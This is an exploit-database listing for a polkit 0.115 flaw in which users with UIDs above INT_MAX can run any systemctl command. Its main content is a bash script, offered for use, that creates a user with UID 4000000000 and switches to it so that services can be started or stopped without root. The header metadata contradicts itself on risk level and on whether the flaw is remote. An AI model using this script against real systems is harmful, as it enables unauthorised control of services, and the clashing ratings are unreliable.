PolicyKit (aka polkit) 0.115 INT_MAX

2020.05.04
ir MSS Team (IR) ir
Risk: Low
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#################################################################### # Exploit Title : PolicyKit (aka polkit) 0.115 INT_MAX #Author : MSS Team #Tested On : Linux #################################################################### #A flaw was found in PolicyKit (aka polkit) 0.115 that allows a user with a uid greater than INT_MAX to successfully execute any systemctl #command. #This issue affects the versions of polkit as shipped with Red Hat Enterprise Linux 6 and 7. #Red Hat Enterprise Linux 6 is now in Maintenance Support 2 Phase of the support and maintenance life cycle. #You can use this simple code then you can start,stop,restart,ETC without root permissions #!/bin/bash if [[ $EUID -ne 0 ]]; then echo "You must be a root user" 2>&1 exit 1 else groupadd -g 4000000000 cve201819788 useradd -m -c "User With High UID" -u 4000000000 -g 4000000000 -s /bin/bash cve201819788 id cve201819788 su cve201819788 - fi


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top